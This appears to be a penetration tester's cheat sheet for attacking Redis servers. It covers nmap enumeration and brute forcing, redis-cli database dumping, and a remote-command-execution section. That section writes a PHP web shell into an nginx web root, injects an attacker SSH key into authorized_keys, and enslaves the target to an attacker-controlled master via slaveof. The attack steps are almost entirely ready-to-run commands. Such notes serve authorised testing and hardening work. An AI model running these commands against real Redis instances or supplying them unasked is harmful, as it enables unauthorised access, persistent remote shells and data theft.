Redis

Introduction

Allows you to store data in memory for fast retrieval.

Is is basically a cache server that allows for quicker access to data. This is commonly used for caching database queries which are large and take a long time to retrieve from the database.

Enumeration

Nmap

nmap -sV -p 6379 --script redis-info <IP>

The nmap script does not work under some circumstances and needs to be updated: https://github.com/nmap/nmap/issues/2296

Updated version: https://raw.githubusercontent.com/jjunqueira/nmap/master/scripts/redis-info.nse

Brute Forcing:

nmap -sV -p 6379 --script redis-brute <ip>

redis-cli

This may need to be installed.

redis-cli -h <IP>

Good enumeration commands: info client list config get * monitor slowlog get 25

Database Enumeration

Databases are numbered starting with 0.

select 0
keys *
get <key-name>

Redis Authentication

To authenticate use the AUTH command

AUTH <password>
AUTH <user> <password>

Redis may require just a password or both a user and password.

Redis Remote Command Execution

The below techniques come from: https://web.archive.org/web/20191201022931/http://reverse-tcp.xyz/pentest/database/2017/02/09/Redis-Hacking-Tips.html Although the site is no longer active, these techniques are still valid.

Create a Web Shell

For this to work, you need to know the full path to where the website is being served from:

root@Urahara:~# redis-cli -h 10.85.0.52
config set dir /usr/share/nginx/html
config set dbfilename redis.php
set test "<?php phpinfo(); ?>"
save

Gain SSH Access

This requires doing some prep work before jumping onto the redis server. 1. Generate a ssh public and private key ssh-keygen -t rsa 1. Write the public key to another file adding some new lines before and after. (echo -e "\n\n"; cat ./.ssh/id_rsa.pub; echo -e "\n\n") > pubKey.txt 1. Import the fine into redis: cat pubKey.txt | redis-cli -h <IP> -x set crackit It appears you need to make sure you are in a writeable directory on redis before you do the above line; otherwise, you will end up with an error. 1. Save the public key in the authorized_keys file

root@Urahara:~# redis-cli -h <IP>
config set dir /var/lib/redis/.ssh
config set dbfilename "authorized_keys"
save

Master & Slave Configuration

master redis : <IP> (Hacker's Server)
slave  redis : <IP> (Target Vulnerability Server)
A master-slave connection will be established from the slave redis and the master redis:
redis-cli -h <IP> -p 6379
slaveof <IP> 6379
Then you can login to the master redis to control the slave redis:
redis-cli -h <IP> -p 6379
set mykey hello
set mykey2 helloworld

Resources

• https://book.hacktricks.xyz/pentesting/6379-pentesting-redis

• https://redis.io/

• https://redis.io/topics/config

• https://web.archive.org/web/20191201022931/http://reverse-tcp.xyz/pentest/database/2017/02/09/Redis-Hacking-Tips.html